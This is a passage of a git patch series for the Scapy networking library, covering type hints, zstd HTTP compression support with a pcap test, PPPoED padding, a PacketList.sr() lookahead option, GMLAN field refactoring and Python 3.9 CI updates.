scapy.compat import Tuple _transports = { 'RC': 0x00, @@ -56,6 +57,7 @@ def opcode(transport, op): + # type: (str, str) -> Tuple[int, str] return (_transports[transport] + _ops[op], '{}_{}'.format(transport, op)) @@ -145,9 +147,11 @@ class BTH(Packet): @staticmethod def pack_icrc(icrc): + # type: (int) -> bytes return struct.pack("!I", icrc & 0xffffffff)[::-1] def compute_icrc(self, p): + # type: (bytes) -> bytes udp = self.underlayer if udp is None or not isinstance(udp, UDP): warning("Expecting UDP underlayer to compute checksum. Got %s.", @@ -182,6 +186,7 @@ def compute_icrc(self, p): # pseudo-header. Add the ICRC header if it is missing and calculate its # value. def post_build(self, p, pay): + # type: (bytes, bytes) -> bytes p += pay if self.icrc is None: p = p[:-4] + self.compute_icrc(p) @@ -197,6 +202,7 @@ class CNPPadding(Packet): def cnp(dqpn): + # type: (int) -> BTH return BTH(opcode=CNP_OPCODE, becn=1, dqpn=dqpn) / CNPPadding() From 45eeda62aca0c05d1df060e49a99cac42566cc69 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 10 Oct 2020 18:48:18 +0200 Subject: [PATCH 0307/1632] Pin MyPy v0.782 --- tox.ini | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tox.ini b/tox.ini index 75834c6a963..266eee9ea20 100644 --- a/tox.ini +++ b/tox.ini @@ -81,7 +81,7 @@ commands = [testenv:mypy] description = "Check Scapy compliance against static typing" skip_install = true -deps = mypy +deps = mypy==0.782 typing commands = python .config/mypy/mypy_check.py From 957d92e5e32da55d1cb3350738bc9b508690d93f Mon Sep 17 00:00:00 2001 From: "P. Chen" Date: Wed, 7 Oct 2020 01:46:33 +0100 Subject: [PATCH 0308/1632] Supporting zstd for HTTP compression. Notice that it may occur in the Content-Encoding field but not (yet) in Transfer-Encoding, according to the IANA registry: https://www.iana.org/assignments/http-parameters/http-parameters.xhtml --- scapy/layers/http.py | 28 +++++++++++++++++++++ test/pcaps/http_compressed-zstd.pcap | Bin 0 -> 266 bytes test/regression.uts | 36 +++++++++++++++++++++++++++ tox.ini | 1 + 4 files changed, 65 insertions(+) create mode 100644 test/pcaps/http_compressed-zstd.pcap diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 6e34a02c94e..58a4efba134 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -41,6 +41,7 @@ # Original Authors : Steeve Barbeau, Luca Invernizzi # Originally published under a GPLv2 license +import io import os import re import struct @@ -65,6 +66,12 @@ except ImportError: _is_brotli_available = False +try: + import zstandard + _is_zstd_available = True +except ImportError: + _is_zstd_available = False + if "http" not in conf.contribs: conf.contribs["http"] = {} conf.contribs["http"]["auto_compression"] = True @@ -318,6 +325,19 @@ def post_dissect(self, s): "Can't import brotli. brotli decompression " "will be ignored !" ) + elif "zstd" in encodings: + if _is_zstd_available: + # Using its streaming API since its simple API could handle + # only cases where there is content size data embedded in + # the frame + bio = io.BytesIO(s) + reader = zstandard.ZstdDecompressor().stream_reader(bio) + s = reader.read() + else: + log_loading.info( + "Can't import zstandard. zstd decompression " + "will be ignored !" + ) except Exception: # Cannot decompress - probably incomplete data pass @@ -344,6 +364,14 @@ def post_build(self, pkt, pay): "Can't import brotli. brotli compression will " "be ignored !" ) + elif "zstd" in encodings: + if _is_zstd_available: + pay = zstandard.ZstdCompressor().compress(pay) + else: + log_loading.info( + "Can't import zstandard. zstd compression will " + "be ignored !" + ) return pkt + pay def self_build(self, field_pos_list=None): diff --git a/test/pcaps/http_compressed-zstd.pcap b/test/pcaps/http_compressed-zstd.pcap new file mode 100644 index 0000000000000000000000000000000000000000..0f2bdd64e8f750e9c8cc11ae300752b422b0d722 GIT binary patch literal 266 zcmca|c+)~A1{MYcU}0bcahPi3bx-mzJOVO77#VOdxH2$Y(Gz!IaA4!(u4iCi1Yw4N zy&L@Bd^ww5{&-P?1QSE`L7*Tb2UoPvntC8E_Xr6I&^OdGR4_6yQ1JKW<#Nu?D@n~O z(RIyB&QHnAOSe*}DlSRk<>KYi*sA}RCBl`N;S-yrOhKpgH-AN`-5R%M$(ZcOkiXP) zow3*KX}B!Eg}};{ZAQ~ tmp && dd bs=1G count=1 status=none | zstd --stdout >> tmp && cat tmp' +# sample client: $ curl -v localhost:8080/tmp_echo_zstd_request_for_testing -o a.html +tmp = "/test/pcaps/http_compressed-zstd.pcap" +filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp +filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename + +# First without auto decompression + +conf.contribs["http"]["auto_compression"] = False +pkts = sniff(offline=filename) + +data = b'\x28\xb5\x2f\xfd\x04\x58\x45\x03\x00\xf2\x06\x19\x1c\x70\x89\x1b\xf6\x4f\x21\x1a\xbb\x28\xda\x9a\x1c\x34\xb8\x68\x1f\xd2\x82\xd7\x01\x8d\x36\xe5\x57\x1d\x0f\x38\x10\xa9\xa9\x86\x32\x96\x3d\xd4\xce\x2d\xa9\x2b\x01\x92\x94\xa8\x17\x23\xb7\xec\x9f\x6e\x96\x23\xb6\x13\x52\x97\xb2\x14\xf6\x0e\x9d\x57\x70\xf0\x2d\x7b\x87\x4c\x2a\x92\x10\x35\x68\x8d\xd9\xe6\x41\xbc\xf7\x73\x84\x07\x7e\xef\x48\xd1\x91\x0d\xef\x0b\x86\x8e\x6b\x86\x12\xaf\xb6\x05\x04\x01\x00\x29\x52\xd2\xfa' + +pkts[0].show() +assert HTTPResponse in pkts[0] +assert pkts[0].Content_Encoding == b'zstd' +assert pkts[0].load == data + +# Now with auto decompression + +conf.contribs["http"]["auto_compression"] = True +pkts = sniff(offline=filename) + +pkts[0].show() +assert HTTPResponse in pkts[0] +assert b'tmp_echo_zstd_request_for_testing' in pkts[0].load + = HTTP PSH bug fix tmp = "/test/pcaps/http_tcp_psh.pcap.gz" diff --git a/tox.ini b/tox.ini index 266eee9ea20..bfe61087b9b 100644 --- a/tox.ini +++ b/tox.ini @@ -23,6 +23,7 @@ deps = mock coverage python-can brotli<1.0.8 + zstandard==0.14.0 platform = linux_non_root,linux_root: linux bsd_non_root,bsd_root: darwin|freebsd|openbsd|netbsd From 58015d673d4883076ecfc166d03c29ebfdf8ef07 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 7 Oct 2020 22:36:19 +0200 Subject: [PATCH 0309/1632] Do not test invalid interfaces --- test/regression.uts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/regression.uts b/test/regression.uts index 46f17cb6e68..5cbc48e0c48 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -146,7 +146,7 @@ if not conf.use_pcap: conf.use_pcap = True assert conf.iface.provider.libpcap for iface in conf.ifaces.values(): - assert iface.provider.libpcap + assert iface.provider.libpcap or iface.is_valid() == False conf.use_pcap = False assert not conf.iface.provider.libpcap From 65eac3369b3673f70295b888d793577a82b936ce Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 7 Oct 2020 21:20:11 +0200 Subject: [PATCH 0310/1632] PPPoED: mysummary & padding --- scapy/layers/ppp.py | 14 ++++++++++++++ test/regression.uts | 6 ++++++ 2 files changed, 20 insertions(+) diff --git a/scapy/layers/ppp.py b/scapy/layers/ppp.py index 3957930c605..01c9e027a7e 100644 --- a/scapy/layers/ppp.py +++ b/scapy/layers/ppp.py @@ -62,6 +62,15 @@ class PPPoED(PPPoE): XShortField("sessionid", 0x0), ShortField("len", None)] + def extract_padding(self, s): + if len(s) < 5: + return s, None + length = struct.unpack("!H", s[4:6])[0] + return s[:length], s[length:] + + def mysummary(self): + return self.sprintf("%code%") + # PPPoE Tag types (RFC2516, RFC4638, RFC5578) class PPPoETag(Packet): @@ -97,6 +106,11 @@ class PPPoED_Tags(Packet): name = "PPPoE Tag List" fields_desc = [PacketListField('tag_list', None, PPPoETag)] + def mysummary(self): + return "PPPoE Tags" + ", ".join( + x.sprintf("%tag_type%") for x in self.tag_list + ), [PPPoED] + _PPP_PROTOCOLS = { 0x0001: "Padding Protocol", diff --git a/test/regression.uts b/test/regression.uts index 5cbc48e0c48..1b37e2ac0ea 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2568,6 +2568,12 @@ assert(r[1].tag_len==4) assert(r[1].tag_value==b'\x01\x02\x03\x04') assert(r[2].tag_type==0x0000) += PPPoE with padding +~ ppp pppoe +p = CookedLinux(b'\x00\x00\x00\x01\x00\x06\x00\x1d\xaa\x00\x00\x00\x00\x00\x88c\x11\xa7\x08\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8e\xf3\x9d\xf1\xc5C\xbe\xde') +assert p.summary() == 'CookedLinux / PPPoE Active Discovery Terminate (PADT) / Padding' +assert p[PPPoED].len == 0 +assert len(p[Padding].load) == 44 = PPP/HDLC ~ ppp hdlc From 1cb0efc7eb9df31ab11228892c1cf0df2f196a3d Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 12 Oct 2020 08:50:01 +0200 Subject: [PATCH 0311/1632] Add new parameter to PacketList.sr(). This parameter limits the lookahead width to search for a answer packet in the remaining list. With this parameter, the sr() function can be speed up drastically on long PacketLists. --- scapy/plist.py | 21 ++++++++++++----- test/regression.uts | 56 +++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 71 insertions(+), 6 deletions(-) diff --git a/scapy/plist.py b/scapy/plist.py index ef726684490..20f676aebcc 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -745,17 +745,26 @@ def convert_to(self, other_cls, name=None, stats=None): class PacketList(_PacketList[Packet], BasePacketList, _CanvasDumpExtended): - def sr(self, multi=0): - # type: (int) -> Tuple[SndRcvList, PacketList] - """sr([multi=1]) -> (SndRcvList, PacketList) - Matches packets in the list and return ( (matched couples), (unmatched packets) )""" # noqa: E501 + def sr(self, multi=False, lookahead=None): + # type: (bool, Optional[int]) -> Tuple[SndRcvList, PacketList] + """ + Matches packets in the list + + :param multi: True if a packet can have multiple answers + :param lookahead: Maximum number of packets between packet and answer. + If 0 or None, full remaining list is + scanned for answers + :return: ( (matched couples), (unmatched packets) ) + """ remain = self.res[:] - sr = [] + sr = [] # type: List[Tuple[Packet, Packet]] i = 0 + if lookahead is None or lookahead == 0: + lookahead = len(remain) while i < len(remain): s = remain[i] j = i - while j < len(remain) - 1: + while j < min(lookahead + i, len(remain) - 1): j += 1 r = remain[j] if r.answers(s): diff --git a/test/regression.uts b/test/regression.uts index 1b37e2ac0ea..ee51c6af717 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -11891,6 +11891,62 @@ p[IP] ############ + PacketList methods += sr() + +class Req(Packet): + fields_desc = [ + ByteField("raw", 0) + ] + def answers(self, other): + return False + +class Res(Packet): + fields_desc = [ + ByteField("raw", 0) + ] + def answers(self, other): + return other.__class__ == Req and other.raw == self.raw + +pl = PacketList([Req(b"1"), Res(b"1"), Req(b"2"), Req(b"3"), Req(b"4"), Res(b"3"), Res(b"1"), Res(b"1"), Res(b"4")]) + +srl, rl = pl.sr() +assert len(srl) == 3 +assert len(rl) == 3 + +srl, rl = pl.sr(lookahead=1) +assert len(srl) == 1 +assert len(rl) == 7 + +srl, rl = pl.sr(lookahead=2) +assert len(srl) == 2 +assert len(rl) == 5 + +srl, rl = pl.sr(lookahead=3) +assert len(srl) == 3 +assert len(rl) == 3 + +pl = PacketList([Req(b"\x05"), Res(b"1"), Res(b"2"), Res(b"3"), Res(b"4"), Res(b"3"), Res(b"1"), Res(b"1"), Res(b"\x05")]) + +srl, rl = pl.sr(lookahead=3) +assert len(srl) == 0 +assert len(rl) == 9 + +srl, rl = pl.sr(lookahead=7) +assert len(srl) == 0 +assert len(rl) == 9 + +srl, rl = pl.sr(lookahead=8) +assert len(srl) == 1 +assert len(rl) == 7 + +srl, rl = pl.sr(lookahead=0) +assert len(srl) == 1 +assert len(rl) == 7 + +srl, rl = pl.sr(lookahead=None) +assert len(srl) == 1 +assert len(rl) == 7 + = plot() import mock From 094e50d6b53cb72db7e669001d47d2a4e3ff916a Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 12 Oct 2020 20:50:16 +0200 Subject: [PATCH 0312/1632] Remove duplicated fields for GMLAN --- scapy/contrib/automotive/gm/gmlan.py | 82 +++++++++++++++++----------- 1 file changed, 51 insertions(+), 31 deletions(-) diff --git a/scapy/contrib/automotive/gm/gmlan.py b/scapy/contrib/automotive/gm/gmlan.py index 70513ba2b3c..c92cb66e844 100644 --- a/scapy/contrib/automotive/gm/gmlan.py +++ b/scapy/contrib/automotive/gm/gmlan.py @@ -11,7 +11,7 @@ from scapy.fields import ObservableDict, XByteEnumField, ByteEnumField, \ ConditionalField, XByteField, StrField, XShortEnumField, XShortField, \ X3BytesField, XIntField, ShortField, PacketField, PacketListField, \ - FieldListField + FieldListField, MultipleTypeField from scapy.packet import Packet, bind_layers, NoPayload from scapy.config import conf from scapy.error import warning, log_loading @@ -420,12 +420,16 @@ def get_log(pkt): class GMLAN_RMBA(Packet): name = 'ReadMemoryByAddress' fields_desc = [ - ConditionalField(XShortField('memoryAddress', 0), - lambda pkt: GMLAN.determine_len(2)), - ConditionalField(X3BytesField('memoryAddress', 0), - lambda pkt: GMLAN.determine_len(3)), - ConditionalField(XIntField('memoryAddress', 0), - lambda pkt: GMLAN.determine_len(4)), + MultipleTypeField( + [ + (XShortField('memoryAddress', 0), + lambda pkt: GMLAN.determine_len(2)), + (X3BytesField('memoryAddress', 0), + lambda pkt: GMLAN.determine_len(3)), + (XIntField('memoryAddress', 0), + lambda pkt: GMLAN.determine_len(4)) + ], + XIntField('memoryAddress', 0)), XShortField('memorySize', 0), ] @@ -441,12 +445,16 @@ def get_log(pkt): class GMLAN_RMBAPR(Packet): name = 'ReadMemoryByAddressPositiveResponse' fields_desc = [ - ConditionalField(XShortField('memoryAddress', 0), - lambda pkt: GMLAN.determine_len(2)), - ConditionalField(X3BytesField('memoryAddress', 0), - lambda pkt: GMLAN.determine_len(3)), - ConditionalField(XIntField('memoryAddress', 0), - lambda pkt: GMLAN.determine_len(4)), + MultipleTypeField( + [ + (XShortField('memoryAddress', 0), + lambda pkt: GMLAN.determine_len(2)), + (X3BytesField('memoryAddress', 0), + lambda pkt: GMLAN.determine_len(3)), + (XIntField('memoryAddress', 0), + lambda pkt: GMLAN.determine_len(4)) + ], + XIntField('memoryAddress', 0)), StrField('dataRecord', None, fmt="B") ] @@ -571,12 +579,16 @@ class GMLAN_DPBA(Packet): name = 'DefinePIDByAddress' fields_desc = [ XShortField('parameterIdentifier', 0), - ConditionalField(XShortField('memoryAddress', 0), - lambda pkt: GMLAN.determine_len(2)), - ConditionalField(X3BytesField('memoryAddress', 0), - lambda pkt: GMLAN.determine_len(3)), - ConditionalField(XIntField('memoryAddress', 0), - lambda pkt: GMLAN.determine_len(4)), + MultipleTypeField( + [ + (XShortField('memoryAddress', 0), + lambda pkt: GMLAN.determine_len(2)), + (X3BytesField('memoryAddress', 0), + lambda pkt: GMLAN.determine_len(3)), + (XIntField('memoryAddress', 0), + lambda pkt: GMLAN.determine_len(4)) + ], + XIntField('memoryAddress', 0)), XByteField('memorySize', 0), ] @@ -612,12 +624,16 @@ class GMLAN_RD(Packet): name = 'RequestDownload' fields_desc = [ XByteField('dataFormatIdentifier', 0), - ConditionalField(XShortField('memorySize', 0), - lambda pkt: GMLAN.determine_len(2)), - ConditionalField(X3BytesField('memorySize', 0), - lambda pkt: GMLAN.determine_len(3)), - ConditionalField(XIntField('memorySize', 0), - lambda pkt: GMLAN.determine_len(4)), + MultipleTypeField( + [ + (XShortField('memorySize', 0), + lambda pkt: GMLAN.determine_len(2)), + (X3BytesField('memorySize', 0), + lambda pkt: GMLAN.determine_len(3)), + (XIntField('memorySize', 0), + lambda pkt: GMLAN.determine_len(4)) + ], + XIntField('memorySize', 0)) ] @staticmethod @@ -638,12 +654,16 @@ class GMLAN_TD(Packet): name = 'TransferData' fields_desc = [ ByteEnumField('subfunction', 0, subfunctions), - ConditionalField(XShortField('startingAddress', 0), - lambda pkt: GMLAN.determine_len(2)), - ConditionalField(X3BytesField('startingAddress', 0), - lambda pkt: GMLAN.determine_len(3)), - ConditionalField(XIntField('startingAddress', 0), - lambda pkt: GMLAN.determine_len(4)), + MultipleTypeField( + [ + (XShortField('startingAddress', 0), + lambda pkt: GMLAN.determine_len(2)), + (X3BytesField('startingAddress', 0), + lambda pkt: GMLAN.determine_len(3)), + (XIntField('startingAddress', 0), + lambda pkt: GMLAN.determine_len(4)) + ], + XIntField('startingAddress', 0)), StrField("dataRecord", None) ] From 4bbd8d53cca8aaa071e19c51a8b978041170d763 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 13 Oct 2020 09:48:58 +0200 Subject: [PATCH 0313/1632] Set sent_time in ISOTP_ENETSocket --- scapy/contrib/automotive/bmw/enet.py | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/automotive/bmw/enet.py b/scapy/contrib/automotive/bmw/enet.py index ebc5e356519..cd8bfbc72dd 100644 --- a/scapy/contrib/automotive/bmw/enet.py +++ b/scapy/contrib/automotive/bmw/enet.py @@ -8,6 +8,7 @@ import struct import socket +import time from scapy.packet import Packet, bind_layers, bind_bottom_up from scapy.fields import IntField, ShortEnumField, XByteField from scapy.layers.inet import TCP @@ -19,7 +20,8 @@ """ -BMW specific diagnostic over IP protocol implementation ENET +BMW specific diagnostic over IP protocol implementation ENET. +Also called BMW FAST. """ # #########################ENET################################### @@ -85,8 +87,13 @@ def __init__(self, src, dst, ip='127.0.0.1', port=6801, basecls=ISOTP): def send(self, x): if not isinstance(x, ISOTP): - raise Scapy_Exception("Please provide a packet class based on " - "ISOTP") + raise Scapy_Exception( + "Please provide a packet class based on ISOTP") + try: + x.sent_time = time.time() + except AttributeError: + pass + super(ISOTP_ENETSocket, self).send( ENET(src=self.src, dst=self.dst) / x) From 881428c44642474c6007106828a97df0ecac002e Mon Sep 17 00:00:00 2001 From: Adam Hackbarth Date: Tue, 13 Oct 2020 23:47:52 -0400 Subject: [PATCH 0314/1632] resolved duplicates --- scapy/contrib/rpl_metrics.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/rpl_metrics.py b/scapy/contrib/rpl_metrics.py index 25e203b126e..afaa1789249 100644 --- a/scapy/contrib/rpl_metrics.py +++ b/scapy/contrib/rpl_metrics.py @@ -123,8 +123,8 @@ class RPLDAGMCNSA(DAGMCObj): # NSA Object Body Format ByteField("res", 0), BitField("flags", 0, 6), - BitField("A", 0, 1), - BitField("O", 0, 1)] + BitField("A2", 0, 1), + BitField("O2", 0, 1)] class RPLDAGMCNodeEnergy(DAGMCObj): From fba21efcddb7fbb94c24befa18edf82c6c791e69 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 14 Oct 2020 11:33:54 +0200 Subject: [PATCH 0315/1632] Python 3.9 support (#2851) * Unit tests linting for Python 3.9 * Python 3.9 support --- .github/workflows/unittests.yml | 16 ++--- setup.py | 1 + test/.ipsec.uts.swp | Bin 0 -> 16384 bytes test/contrib/nfs.uts | 124 +++++++------------------------- test/contrib/portmap.uts | 25 ++----- tox.ini | 6 +- 6 files changed, 43 insertions(+), 129 deletions(-) create mode 100644 test/.ipsec.uts.swp diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 59bd578fcb1..fb8b072cc1a 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -10,9 +10,9 @@ jobs: - name: Checkout Scapy uses: actions/checkout@v2 - name: Setup Python - uses: actions/setup-python@v1 + uses: actions/setup-python@v2 with: - python-version: 3.8 + python-version: 3.9 - name: Install tox run: pip install tox - name: Run flake8 tests @@ -28,9 +28,9 @@ jobs: - name: Checkout Scapy uses: actions/checkout@v2 - name: Setup Python - uses: actions/setup-python@v1 + uses: actions/setup-python@v2 with: - python-version: 3.8 + python-version: 3.9 - name: Install tox run: pip install tox - name: Build docs @@ -42,9 +42,9 @@ jobs: - name: Checkout Scapy uses: actions/checkout@v2 - name: Setup Python - uses: actions/setup-python@v1 + uses: actions/setup-python@v2 with: - python-version: 3.8 + python-version: 3.9 - name: Install tox run: pip install tox - name: Run mypy @@ -56,12 +56,12 @@ jobs: runs-on: ubuntu-latest strategy: matrix: - python: [2.7, pypy2, pypy3, 3.5, 3.6, 3.7, 3.8] + python: [2.7, pypy2, pypy3, 3.5, 3.6, 3.7, 3.8, 3.9] steps: - name: Checkout Scapy uses: actions/checkout@v2 - name: Setup Python - uses: actions/setup-python@v1 + uses: actions/setup-python@v2 with: python-version: ${{ matrix.python }} - name: Install Tox and any other packages diff --git a/setup.py b/setup.py index 2c60986cb80..992adca027b 100755 --- a/setup.py +++ b/setup.py @@ -96,6 +96,7 @@ def process_ignore_tags(buffer): "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", + "Programming Language :: Python :: 3.9", "Topic :: Security", "Topic :: System :: Networking", "Topic :: System :: Networking :: Monitoring", diff --git a/test/.ipsec.uts.swp b/test/.ipsec.uts.swp new file mode 100644 index 0000000000000000000000000000000000000000..eb93d54d7599512d1d4de359f53cea960bc3df0a GIT binary patch literal 16384 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 Ut1BbaSWTNMdaq9d;^o%(C(tt_>Hq)$ literal 0 HcmV?d00001 diff --git a/test/contrib/nfs.uts b/test/contrib/nfs.uts index e1100a57cbb..535eb05f046 100644 --- a/test/contrib/nfs.uts +++ b/test/contrib/nfs.uts @@ -601,104 +601,32 @@ pkt = ACCESS_Reply( ) assert bytes(pkt) == b'\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x01\xed\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\xff\xff\xff\xff\xff\xff\xff\xff\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x04\x00\x00\x00\x05\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xdd\xdd\xdd\xdd\xee\xee\xee\xee\xff\xff\xff\xff\x11\x11\x11\x11""""3333\x00\x00\x00\n' -pkt = READDIRPLUS_Reply( - status=0, - attributes_follow=1, - attributes=Fattr3( - type='NF3DIR', - mode=0o755, - nlink=1, - uid=2, - gid=3, - size=0xffffffffffffffff, - used=0xaaaaaaaaaaaaaaaa, - rdev=[4, 5], - fsid=0xbbbbbbbbbbbbbbbb, - fileid=0xcccccccccccccccc, - atime_s=0xdddddddd, - atime_ns=0xeeeeeeee, - mtime_s=0xffffffff, - mtime_ns=0x11111111, - ctime_s=0x22222222, - ctime_ns=0x33333333 - ), - verifier=0xa, - value_follows=1, - files=[ - File_From_Dir_Plus( - fileid=0xa, - filename=Object_Name( - length=5, - _name='file1', - fill='\x00\x00\x00' - ), - cookie=0xb, - attributes_follow=1, - attributes=Fattr3( - type='NF3REG', - mode=0o755, - nlink=1, - uid=2, - gid=3, - size=0xffffffffffffffff, - used=0xaaaaaaaaaaaaaaaa, - rdev=[4, 5], - fsid=0xbbbbbbbbbbbbbbbb, - fileid=0xcccccccccccccccc, - atime_s=0xdddddddd, - atime_ns=0xeeeeeeee, - mtime_s=0xffffffff, - mtime_ns=0x11111111, - ctime_s=0x22222222, - ctime_ns=0x33333333 - ), - handle_follows=1, - filehandle=File_Object( - length=3, - fh='fh1', - fill='\x00' - ), - value_follows=1 - ), - - File_From_Dir_Plus( - fileid=0xb, - filename=Object_Name( - length=5, - _name='file2', - fill='\x00\x00\x00' - ), - cookie=0xc, - attributes_follow=1, - attributes=Fattr3( - type='NF3REG', - mode=0o755, - nlink=1, - uid=2, - gid=3, - size=0xffffffffffffffff, - used=0xaaaaaaaaaaaaaaaa, - rdev=[4, 5], - fsid=0xbbbbbbbbbbbbbbbb, - fileid=0xcccccccccccccccc, - atime_s=0xdddddddd, - atime_ns=0xeeeeeeee, - mtime_s=0xffffffff, - mtime_ns=0x11111111, - ctime_s=0x22222222, - ctime_ns=0x33333333 - ), - handle_follows=1, - filehandle=File_Object( - length=3, - fh='fh2', - fill='\x00' - ), - value_follows=0 - ) - ], - eof=1 -) +pkt = READDIRPLUS_Reply(status=0, attributes_follow=1, + attributes=Fattr3(type='NF3DIR', mode=0o755, nlink=1, uid=2, + gid=3, size=0xffffffffffffffff, used=0xaaaaaaaaaaaaaaaa, + rdev=[4, 5], fsid=0xbbbbbbbbbbbbbbbb, fileid=0xcccccccccccccccc, + atime_s=0xdddddddd, atime_ns=0xeeeeeeee, 